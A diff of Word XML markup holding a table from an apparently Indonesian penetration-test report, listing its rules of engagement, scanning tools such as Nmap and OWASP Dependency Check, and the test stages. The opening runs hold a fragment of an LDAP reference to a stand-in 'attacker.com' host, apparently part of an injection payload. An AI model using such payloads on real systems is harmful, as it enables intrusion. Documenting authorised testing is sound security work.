+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>cn=1807422020,dc=attacker</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>,dc=com</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Aturan Keterlibatan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>✓</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Regulasi </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Tidak ada restriksi durasi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Lokasi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Indonesia</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Izin </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Penetrasi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Personal</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:iCs/>
+              </w:rPr>
+              <w:t>white-box</w:t>
+            </w:r>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Program Pengujian</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>✓</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Pemindaian </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>OWASP Dependency Check</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>OSSIndex Maven</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Virus Total</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Nmap</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Observasi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Utilitas program pemantauan Linux</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1696" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Eksploitasi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3730" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Cooki3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Kapabilitas Pengujian</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>✓</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5426" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Pengumpulan informasi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5426" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Pemindaian dan analisis kerentanan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5426" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Penetrasi </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>atau</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Penyerangan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
